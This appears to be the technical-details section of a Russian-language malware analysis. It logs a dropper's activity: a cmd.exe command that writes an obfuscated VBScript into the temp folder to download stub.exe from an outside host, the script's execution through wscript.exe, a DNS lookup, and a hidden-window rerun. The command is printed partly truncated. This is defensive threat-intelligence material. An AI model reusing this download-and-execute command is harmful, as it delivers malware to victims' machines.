Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO N3x= "http://www.mici2k.16mb.com/stub.exe">>B0s.VBS &@ECHO Y9k = G3y("HVSTREQI2I\I")>>B0s.VBS &@ECHO Set G5q = CreateObject(G3y("QW\QP62\QPLXXT"))>>B0s.VBS &@ECHO G5q.Open ...
- %TEMP%\b0s.vbs
- %TEMP%\b0s.vbs
- DNS ASK mi###k.16mb.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\B0s.VBS"
- '<SYSTEM32>\timeout.exe' 13
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO N3x= "http://www.mici2k.16mb.com/stub.exe">>B0s.VBS &@ECHO Y9k = G3y("HVSTREQI2I\I")>>B0s.VBS &@ECHO Set G5q = CreateObject(G3y("QW\QP62\QPLXXT"))>>B0s.VBS &@ECHO G5q.Open ... (со скрытым окном)